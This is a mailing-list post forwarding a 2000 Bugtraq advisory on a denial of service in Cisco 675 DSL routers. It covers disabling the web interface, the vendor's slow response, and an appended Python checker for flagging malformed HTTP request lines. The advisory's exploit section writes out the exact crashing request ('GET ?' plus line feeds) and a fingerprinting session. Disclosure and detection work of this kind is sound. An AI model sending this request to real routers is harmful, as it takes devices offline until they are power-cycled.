Here's the bugtraq email on it:

OK, since everyone is up in arms over vendor notification and their response times, here's an example of what happens if you give a vendor too -much- time.

-----------------

Title           : Cisco 675 Web Administration Denial of Service
Device          : Cisco 675 DSL Router
Class           : Denial of Service (remote)
Vendor Notified : January 10th, 2000 (Yes folks, 11 months ago)
Patch Available : Nope - see below

---------------------------------

The Cisco 675 DSL routers with the Web Administration Interface enabled can be crashed (hard) using a simple GET request. CBOS versions 2.0.x through 2.2.x have been found to be vulnerable. The new CBOS 2.3.x has not been tested, but there are no notes in the 2.3.x changelogs to indicate that they've fixed this problem. Affected 675s were configured in PPP mode.

The 'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x and 2.2.x.

The Cisco 67x series of DSL routers are produced and distributed for specific telcos to offer to their clients and as such, the installation base is quite large. (To hazard a guess, if just 20% of all Qwest DSL users are using Cisco 675s, the installation base would exceed 25,000.)

The DSL adapters in this series include: Cisco 673, Cisco 675, Cisco 675e, Cisco 676, Cisco 677, and Cisco 678. This advisory applies specifically to the 675, but other adapters in this series may have similar problems and should be tested for vulnerability to this type of attack. I would be interested in the results if someone has access to and can test the other adapters in this series.

The CBOS codebase is an acquired OS and as such has no relationship at all to the main Cisco IOS codebase.

Fix First:

Disable the Web Based Administration Interface in your 675 until a patch or CBOS revision is made available.

Web Server Disable commands: (2.0.x or better) (CBOS 'enable' mode)

    cbos# set web disabled
    cbos# write
    cbos# reboot

Exploit:

First find a 675 with the Web Admin server running.
Fingerprint:

    telnet vic.tim.ip.addr 80
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET / HTTP/1.0
    HTTP/1.0 401 Unauthorized
    Content-type: text/html
    WWW-Authenticate: Basic realm="CISCO_WEB"
    <CENTER><h1>Unauthorized Access 401</h1></center>
    Connection closed by foreign host.

Now kill it:

    telnet vic.tim.ip.addr 80
    Trying vic.tim.ip.addr...
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET ? [LF][LF]

(your telnet session dies here, and so does the router)

Dead as a post:

    ping -c5 vic.tim.ip.addr
    PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
    5 packets transmitted, 0 packets received, 100% packet loss

The Cisco never recovers - it's hosed until the router is power-cycled.

A simple 'GET ? \n\n' is all it takes to kill the router. In case you're wondering, I had meant to enter 'GET /', but my finger slipped on the shift key. Neat eh?

VENDOR RESPONSE:

None, and I'll tell you why. (Warning, long rant ahead that has nothing to do with the guts of this advisory.)

I first notified 'security-alert at cisco.com' in January of this year. Got an immediate response and all seemed well. Then I didn't hear back from them for a couple of months and promptly forgot all about this.

Then in April the 'Cisco IOS Software TELNET Option Handling Vulnerability' (see http://www.securityfocus.com/archive/1/56207) was announced. This vulnerability was very similar to the Cisco 675 problem and I re-contacted Cisco. They claimed they were "still working on replicating the error". Uh, OK, whatever. I placed it on the back-burner and promptly forgot all about it again because I didn't want to announce this vulnerability until a vendor approved fix was available. (The installation base for this adapter is humongous.)

Then in October of this year some discussion of a potential problem with the Cisco 678 occurred on the VULN-DEV mailing list. A Cisco rep on the list had the audacity to complain about prior-notification.
(Never mind that VULN-DEV is designed specifically to investigate potential vulnerabilities.) Anyway, the issue was again brought before Cisco, and they again promised to address this issue.

The conversation on VULN-DEV prompted some private correspondence with CORE SDI. The last I heard from Cisco was actually by way of Iván Arce at CORE SDI, who wanted more information regarding the Cisco 675 problem while he investigated the Cisco IOS and its Web Admin bugs. (See CORE-20002510, BugTraq ID 1838.) The vulnerabilities are strikingly similar even though IOS is a completely separate codebase from CBOS. Anyway, CORE got word from Cisco PSIRT that they would be addressing this issue by "mid November". Needless to say, this hasn't happened yet.

This week's discussion of vendor notification and response times was just gravy.

It should also be noted that since January, Cisco has released at least 2 updates to the CBOS 2.x series without addressing this issue. (No mention of it in their changelogs, although to be fair I've yet to have the opportunity to test this bug against either 2.3.0 or 2.3.5.)

CDI
____________________________________
The Web Master's Net
http://www.thewebmasters.net/

"Ok spammer, I'll 'just hit delete'. You can be 'Delete'."
  -- Ron "SuperTroll" Ritzman, NANAE

> -----Original Message-----
> From: Bill Layer [mailto:b.layer at vikingelectronics.com]
> Sent: Wednesday, November 29, 2000 1:33 PM
> To: tclug-list at lists.real-time.com
> Subject: Re: [TCLUG] Where's CBOS 2.3.5
>
>
> Hi,
>
> On Wednesday 29 November 2000 13:12, you wrote:
> > Now's the time to upgrade too. In case anyone here doesn't follow
> > bugtraq, you can nuke a 675 with the web-port enabled if it's 2.0.x -
> > 2.2.x. Requires a powercycle to get it running again.
>
> Do you have an abstract on that? Don't recall what version I run, but I
> *don't* have web enabled... just curious.
>
> --
> Bill Layer
> Sales Technician
> <b.layer at vikingelectronics.com>
>
> +----------------------------------+
> Viking Electronics, Inc.
> 1531 Industrial St.
> Hudson, WI. 54016 - U.S.A
> 715.386.8861 ext. 210
> <http://www.vikingelectronics.com>
> +----------------------------------+
>
> "Telecom Solutions for the 21st Century"
> Powered by Slackware Linux 7.1.0
>
> _______________________________________________
> tclug-list mailing list
> tclug-list at lists.real-time.com
> https://mailman.real-time.com/mailman/listinfo/tclug-list
>
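The advisory's trigger is a request line that is not valid HTTP at all: the request-target is a bare "?" rather than a path, and there is no HTTP-Version token. As an added illustration (not part of the advisory or of this list thread), here is a small Python request-line checker of the kind a defender could run over web-server or proxy logs, or over the request lines recovered from a capture in front of a management interface, to surface malformed request lines of exactly that shape. The function names, the `Verdict` class and the sample request lines are all mine; the sample lines are constructed, not captured traffic.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable, List

# Methods an HTTP/1.0-era management interface would legitimately see.
METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE"}
VERSION_RE = re.compile(r"^HTTP/\d\.\d$")
# absoluteURI form (RFC 1945 / RFC 2616); the host part is only loosely checked.
ABS_URI_RE = re.compile(r"^https?://[^\s/]+(/\S*)?$", re.IGNORECASE)


@dataclass
class Verdict:
    line: str                                   # request line as seen, CRLF stripped
    ok: bool                                    # True when the line is well-formed
    reasons: List[str] = field(default_factory=list)


def check_request_line(raw: str) -> Verdict:
    """Classify one HTTP request line as well-formed or malformed.

    Well-formed means: <known method> SP <request-target> SP HTTP/x.y, where
    request-target is an abs_path ("/..."), "*" or an absoluteURI.  A line
    such as "GET ?" (bare "?" target, no version) is reported with one
    reason per defect so the log reviewer sees why it was flagged.
    """
    line = raw.rstrip("\r\n")
    reasons: List[str] = []

    # Control characters (tab, NUL, stray CR, ...) never belong in a request line.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in line):
        reasons.append("control character inside request line")

    parts = line.split(" ")
    if len(parts) not in (2, 3):
        reasons.append(f"expected 2 or 3 space-separated tokens, got {len(parts)}")
        return Verdict(line, False, reasons)

    method, target = parts[0], parts[1]
    if method not in METHODS:
        reasons.append(f"unknown method {method!r}")
    if not (target == "*" or target.startswith("/") or ABS_URI_RE.match(target)):
        reasons.append(f"request-target {target!r} is not abs_path, '*' or absoluteURI")
    if len(parts) == 3:
        if not VERSION_RE.match(parts[2]):
            reasons.append(f"malformed HTTP-Version {parts[2]!r}")
    else:
        # Two tokens is an HTTP/0.9 "simple request"; flag it, since a
        # Basic-auth admin UI of this era has no business receiving those.
        reasons.append("no HTTP-Version (HTTP/0.9 simple request)")

    return Verdict(line, not reasons, reasons)


def suspicious(lines: Iterable[str]) -> List[Verdict]:
    """Return the verdict for every line that fails the check."""
    return [v for v in (check_request_line(l) for l in lines) if not v.ok]


# Constructed sample input (not captured traffic): normal admin-UI requests
# mixed with the malformed shapes a log review should surface.
SAMPLE_REQUEST_LINES = [
    "GET / HTTP/1.0\r\n",                       # the advisory's fingerprint request: fine
    "GET ?\r\n",                                # the shape the advisory reports as fatal
    "GET /index.html HTTP/1.1\r\n",
    "HEAD * HTTP/1.0\r\n",
    "FOO /status HTTP/1.0\r\n",                 # unknown method
    "GET /status HTTP/9\r\n",                   # bad version token
    "GET http://router.example/ HTTP/1.0\r\n",  # absoluteURI form: fine
]

if __name__ == "__main__":
    for v in suspicious(SAMPLE_REQUEST_LINES):
        print(f"FLAG {v.line!r}: " + "; ".join(v.reasons))
```

On the constructed sample the checker flags three lines: the bare "GET ?" (two reasons: non-path target and missing version), the unknown method, and the bad version token. Whether an HTTP/0.9 two-token request should count as a finding is a policy choice; it is treated as one here because a management interface that only answers with a 401 challenge will never see a legitimate simple request.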